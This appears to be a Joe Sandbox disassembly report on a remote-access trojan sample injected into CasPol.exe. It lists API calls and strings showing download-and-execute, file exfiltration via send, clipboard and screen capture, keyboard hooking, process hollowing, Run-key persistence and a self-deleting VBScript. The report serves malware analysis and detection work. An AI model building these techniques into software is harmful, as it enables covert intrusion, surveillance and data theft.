                            • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                            • String ID:
                            • API String ID: 1771804793-0
                            • Opcode ID: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
                            • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                            • Opcode Fuzzy Hash: 24d131f499e64054f79a0f46ecbae19e6fc47dfee84614c45b7e196f831b81b6
                            • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: DownloadExecuteFileShell
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                            • API String ID: 2825088817-4197237851
                            • Opcode ID: 69075e968859f1327e759487f5d3b6cbdb930596ea59a23a81903788949ec952
                            • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                            • Opcode Fuzzy Hash: 69075e968859f1327e759487f5d3b6cbdb930596ea59a23a81903788949ec952
                            • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: FileFind$FirstNextsend
                            • String ID: XPG$XPG
                            • API String ID: 4113138495-1962359302
                            • Opcode ID: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
                            • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                            • Opcode Fuzzy Hash: 8ee3c4b34050bfc3eb39b734b42787355f0f4c7cc0427839037de91a24499d9f
                            • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                            APIs
                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                              • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                              • Part of subcall function 0041376F: RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                              • Part of subcall function 0041376F: RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: CloseCreateInfoParametersSystemValue
                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                            • API String ID: 4127273184-3576401099
                            • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                            • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                            • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                            • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: ErrorInfoLastLocale$_free$_abort
                            • String ID:
                            • API String ID: 2829624132-0
                            • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                            • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                            • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                            • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                            • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                            • ExitProcess.KERNEL32 ref: 004432EF
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                            • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                            • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                            • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                            APIs
                            • OpenClipboard.USER32(00000000), ref: 0040B711
                            • GetClipboardData.USER32(0000000D), ref: 0040B71D
                            • CloseClipboard.USER32 ref: 0040B725
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: Clipboard$CloseDataOpen
                            • String ID:
                            • API String ID: 2058664381-0
                            • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                            • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                            • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                            • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                            • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                            • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                            • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: lJD
                            • API String ID: 1084509184-3316369744
                            • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                            • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                            • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                            • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: lJD
                            • API String ID: 1084509184-3316369744
                            • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                            • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                            • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                            • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: InfoLocale
                            • String ID: GetLocaleInfoEx
                            • API String ID: 2299586839-2904428671
                            • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                            • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                            • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                            • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: Heap$FreeProcess
                            • String ID:
                            • API String ID: 3859560861-0
                            • Opcode ID: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                            • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                            • Opcode Fuzzy Hash: 9f2d401c641a2cfb93471127350fb786a64fc0260f1ce6cfe78b140b0d52c749
                            • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: ErrorLast$_free$InfoLocale_abort
                            • String ID:
                            • API String ID: 1663032902-0
                            • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                            • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                            • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                            • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: ErrorLast$InfoLocale_abort_free
                            • String ID:
                            • API String ID: 2692324296-0
                            • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                            • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                            • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                            APIs
                              • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                            • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                            • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                            • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                            • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                            • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                            • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                            • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                            APIs
                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                            • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                              • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                            • DeleteDC.GDI32(00000000), ref: 00418F2A
                            • DeleteDC.GDI32(00000000), ref: 00418F2D
                            • DeleteObject.GDI32(00000000), ref: 00418F30
                            • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                            • DeleteDC.GDI32(00000000), ref: 00418F62
                            • DeleteDC.GDI32(00000000), ref: 00418F65
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                            • GetIconInfo.USER32(?,?), ref: 00418FBD
                            • DeleteObject.GDI32(?), ref: 00418FEC
                            • DeleteObject.GDI32(?), ref: 00418FF9
                            • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                            • DeleteDC.GDI32(?), ref: 0041917C
                            • DeleteDC.GDI32(00000000), ref: 0041917F
                            • DeleteObject.GDI32(00000000), ref: 00419182
                            • GlobalFree.KERNEL32(?), ref: 0041918D
                            • DeleteObject.GDI32(00000000), ref: 00419241
                            • GlobalFree.KERNEL32(?), ref: 00419248
                            • DeleteDC.GDI32(?), ref: 00419258
                            • DeleteDC.GDI32(00000000), ref: 00419263
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                            • String ID: DISPLAY
                            • API String ID: 479521175-865373369
                            • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                            • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                            • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                            • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                            • GetProcAddress.KERNEL32(00000000), ref: 00418139
                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                            • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                            • GetProcAddress.KERNEL32(00000000), ref: 00418161
                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                            • GetProcAddress.KERNEL32(00000000), ref: 00418175
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                            • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                            • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                            • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                            • ResumeThread.KERNEL32(?), ref: 00418435
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                            • GetCurrentProcess.KERNEL32(?), ref: 00418457
                            • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                            • GetLastError.KERNEL32 ref: 0041847A
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                            • API String ID: 4188446516-3035715614
                            • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                            • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                            • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                            • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                            APIs
                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                              • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                              • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                            • ExitProcess.KERNEL32 ref: 0040D7D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                            • API String ID: 1861856835-332907002
                            • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                            • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                            • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                            • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                            APIs
                              • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                              • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                              • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                              • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                            • ExitProcess.KERNEL32 ref: 0040D419
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
